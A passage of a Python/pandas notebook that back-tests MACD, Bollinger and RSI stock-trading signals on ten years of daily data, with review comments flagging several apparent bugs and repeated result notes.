Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# --- Wrap-up of the (4-15)-9 revised-MACD back-test: append synthetic closing
# --- Sell rows for still-open positions, merge into one ledger, summarise P/L. ---
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
# each synthetic row occupies 6 consecutive entries in add_rows_list
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
# NOTE(review): add_rows_df carries no 'macd' column, so concat leaves NaN there for synthetic rows
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
# NOTE(review): groupby(...)['Value'].sum() returns a Series; assigning .columns
# below does NOT rename anything — it only sets a stray attribute. Verify intent.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: within each Symbol, diff() yields (Sell total - Buy total);
# mul(100) scales the Rs 10,000 per-stock stake up to the 10-lakh notional investment
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(4-15)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\MACD Buy_Sell list415.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR MACD STRATEGY
# since the earlier attempts to change the MA did not help,
# lets try with taking only those calls into consideration where MACD is positive (so ignoring those that are negative)
# Then do the back-testing to check if this strategy helps get a better number of positives from the current 55.
# Overall profit is negative (loss)
# Do this against EMA4-EMA15 MACD; and crossover at MACD9
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# ADDITION OF MACD > 0 for any Buy or Sell.... GOT 40/100 positive - BUT LOSS.
# LETS TRY NOW AT MACD > 10.... GOT 43/100 - so getting worse - LOSS
# LETS TRY with MACD > -10... GOT 51/100 - so getting better - PROFIT
# LETS TRY WITH MACD > -50... GOT 50/100 - but PROFIT increased - seems to be getting better
# LETS TRY WITH MACD > -100... GOT 51/100 - but PROFIT increased - seems to be getting better
# LETS TRY WITH MACD > -250... GOT 52/100 - but PROFIT increased - seems to be getting better
# LETS TRY WITH MACD > -500... GOT 52/100 - but PROFIT started to reduce
# LETS TRY WITH MACD > -500... GOT 52/100 - but PROFIT increased - seems to be getting better
# LETS TRY WITH MACD > -1000... GOT 52/100 - but PROFIT increased vs -500 - seems to be getting better
# LETS TRY WITH MACD > -5000... GOT 52/100 - but PROFIT increased - seems to be getting better
# So just playing with MACD value alone does not help. Lets link MACD_REVISED (5,20) with MACD > 0 - got 44... LOSS
# so such MACD value usage could be leading to a problem
# lets try with OBV and see how that works
# MACD REVISED - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
# Buy while the revised MACD line sits above the macd9 signal line, Sell otherwise
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
df1_grouped = daily_data_back_test.groupby('Symbol')
# Back-test loop: walk each symbol's rows in order, alternating Buy/Sell
# (next_step 1 = looking to buy, 0 = looking to sell). Each executed trade is
# appended to Back_Test_10yrs_r as 6 flat fields: Date, Symbol, Txn, Close, Qty, macd.
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # per-group row counter
    j = 0 # counts recorded trades for this symbol (value apparently unused afterwards)
    number_stock = 0
    money = 10000 # Rs 10,000 stake per stock (not 10 lakhs; the summary step scales by 100)
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        # NOTE(review): i restarts at 0 per symbol, but index[-1] is the group's last
        # GLOBAL index label, so this guard appears to be effectively always true — confirm.
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'macd'] > 0: # additional condition added: only act when baseline MACD is positive
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Sell")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        Back_Test_10yrs_r.append(row['macd'])
                        money = money + row['Close'] * number_stock
                        next_step = 1
                        j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'macd'] > 0: # additional condition added: only act when baseline MACD is positive
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
                        number_stock = money // row['Close'] # floor division to get the integer number of stocks
                        if number_stock > 0:
                            Back_Test_10yrs_r.append(row['Date'])
                            Back_Test_10yrs_r.append(row['Symbol'])
                            Back_Test_10yrs_r.append("Buy")
                            Back_Test_10yrs_r.append(row['Close'])
                            Back_Test_10yrs_r.append(number_stock)
                            Back_Test_10yrs_r.append(row['macd'])
                            money = money - row['Close'] * number_stock
                            next_step = 0
                            j = j + 1
        i = i + 1
# +
# --- Post-processing for the MACD(4,15)-9 + macd>0 run: flatten the trade list
# --- into a ledger, close out still-open Buy positions at the 2020-08-28 close,
# --- and summarise per-symbol profit/loss via Summarize_Report. ---
# Split the consolidate list into multiple lists with 6 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
# Scan the ledger; whenever a symbol's trades end on an open "Buy", emit a
# synthetic closing "Sell" at the 2020-08-28 close so P/L can be computed.
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # symbol changed while the previous symbol was still held: close it out
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        if ((i == row_count) and (row['Txn'] == "Buy")):
            # very last ledger row is an open Buy: close it out as well
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
# NOTE(review): add_rows_df carries no 'macd' column, so concat leaves NaN there for synthetic rows
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
# NOTE(review): the groupby sum is a Series; assigning .columns does not rename anything — verify
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: within each Symbol, diff() yields (Sell total - Buy total);
# mul(100) scales the Rs 10,000 per-stock stake up to the 10-lakh notional investment
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(4-15)-9 AND macd > 0", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(20)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\MACD Buy_Sell list415 macd 5000.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR MACD & BOLLINGER STRATEGY
# since the earlier attempts to change the MA did not help,
# lets try with taking only those calls into consideration where MACD is positive (so ignoring those that are negative)
# Then do the back-testing to check if this strategy helps get a better number of positives from the current 55.
# Overall profit is negative (loss)
# Do this against EMA4-EMA15 MACD; and crossover at MACD9; Bollinger
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
df1_grouped = daily_data_back_test.groupby('Symbol')
# Back-test loop: trade only when BOTH the Bollinger signal and the revised-MACD
# signal agree; trades are appended to Back_Test_10yrs_r as 6 flat fields.
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # per-group row counter
    j = 0 # counts recorded trades for this symbol (value apparently unused afterwards)
    number_stock = 0
    money = 10000 # Rs 10,000 stake per stock (not 10 lakhs; the summary step scales by 100)
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        # NOTE(review): i restarts at 0 per symbol, but index[-1] is the group's last
        # GLOBAL index label, so this guard appears to be effectively always true — confirm.
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Sell": # additional condition added
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Sell")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        Back_Test_10yrs_r.append(row['macd'])
                        money = money + row['Close'] * number_stock
                        next_step = 1
                        j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy": # additional condition added
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
                        number_stock = money // row['Close'] # floor division to get the integer number of stocks
                        if number_stock > 0:
                            Back_Test_10yrs_r.append(row['Date'])
                            Back_Test_10yrs_r.append(row['Symbol'])
                            Back_Test_10yrs_r.append("Buy")
                            Back_Test_10yrs_r.append(row['Close'])
                            Back_Test_10yrs_r.append(number_stock)
                            Back_Test_10yrs_r.append(row['macd'])
                            money = money - row['Close'] * number_stock
                            next_step = 0
                            j = j + 1
        i = i + 1
# +
# --- Post-processing for the Bollinger + MACD(4,15)-9 run: flatten the trade
# --- list into a ledger, close out still-open Buy positions at the 2020-08-28
# --- close, and summarise per-symbol profit/loss via Summarize_Report. ---
# Split the consolidate list into multiple lists with 6 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
# NOTE(review): these dels assume the previous section already created the names;
# running this cell out of order raises NameError — confirm intended cell order
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
# Scan the ledger; whenever a symbol's trades end on an open "Buy", emit a
# synthetic closing "Sell" at the 2020-08-28 close so P/L can be computed.
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # symbol changed while the previous symbol was still held: close it out
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        if ((i == row_count) and (row['Txn'] == "Buy")):
            # very last ledger row is an open Buy: close it out as well
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
# NOTE(review): add_rows_df carries no 'macd' column, so concat leaves NaN there for synthetic rows
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
# NOTE(review): the groupby sum is a Series; assigning .columns does not rename anything — verify
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: within each Symbol, diff() yields (Sell total - Buy total);
# mul(100) scales the Rs 10,000 per-stock stake up to the 10-lakh notional investment
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, macd", "Middle Band & (4-15)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(20)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger_macd415.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR MACD & RSI STRATEGY
# Do this against EMA4-EMA15 MACD; and crossover at MACD9; RSI
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
# RSI gate: "positive" above 25, "negative" at or below 25
daily_data_back_test['TradingStrategyRSI_revised'] = np.where(daily_data_back_test['rsi'] > 25, "positive", "negative")
df1_grouped = daily_data_back_test.groupby('Symbol')
# Back-test loop: buy only when RSI gate is "positive" AND revised MACD says Buy;
# sell only when RSI gate is "negative" AND revised MACD says Sell.
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # per-group row counter
    j = 0 # counts recorded trades for this symbol (value apparently unused afterwards)
    number_stock = 0
    money = 10000 # Rs 10,000 stake per stock (not 10 lakhs; the summary step scales by 100)
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        # NOTE(review): i restarts at 0 per symbol, but index[-1] is the group's last
        # GLOBAL index label, so this guard appears to be effectively always true — confirm.
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "negative": # additional condition added
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Sell")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        Back_Test_10yrs_r.append(row['macd'])
                        money = money + row['Close'] * number_stock
                        next_step = 1
                        j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive": # additional condition added
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
                        number_stock = money // row['Close'] # floor division to get the integer number of stocks
                        if number_stock > 0:
                            Back_Test_10yrs_r.append(row['Date'])
                            Back_Test_10yrs_r.append(row['Symbol'])
                            Back_Test_10yrs_r.append("Buy")
                            Back_Test_10yrs_r.append(row['Close'])
                            Back_Test_10yrs_r.append(number_stock)
                            Back_Test_10yrs_r.append(row['macd'])
                            money = money - row['Close'] * number_stock
                            next_step = 0
                            j = j + 1
        i = i + 1
# +
# --- Post-processing for the RSI>25 + MACD(4,15)-9 run: flatten the trade list
# --- into a ledger, close out still-open Buy positions at the 2020-08-28 close,
# --- and summarise per-symbol profit/loss via Summarize_Report. ---
# Split the consolidate list into multiple lists with 6 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
# Scan the ledger; whenever a symbol's trades end on an open "Buy", emit a
# synthetic closing "Sell" at the 2020-08-28 close so P/L can be computed.
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # symbol changed while the previous symbol was still held: close it out
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        if ((i == row_count) and (row['Txn'] == "Buy")):
            # very last ledger row is an open Buy: close it out as well
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
# NOTE(review): add_rows_df carries no 'macd' column, so concat leaves NaN there for synthetic rows
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
# NOTE(review): the groupby sum is a Series; assigning .columns does not rename anything — verify
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: within each Symbol, diff() yields (Sell total - Buy total);
# mul(100) scales the Rs 10,000 per-stock stake up to the 10-lakh notional investment
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "RSI, macd", "RSI>25, macd (4,15)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\RSI 25 MACD 415 Buy_Sell list.csv')
# +
# LETS LOOK AT A COMBINED STRATEGY
# COMBINED STRATEGY COVERING RSI, MACD AND OBV
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
# RSI gate: "positive" above 25, "negative" at or below 25
daily_data_back_test['TradingStrategyRSI_revised'] = np.where(daily_data_back_test['rsi'] > 25, "positive", "negative")
df1_grouped = daily_data_back_test.groupby('Symbol')
# Back-test loop: a trade requires all THREE signals to agree
# (RSI gate, revised MACD, and the precomputed OBV signal).
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
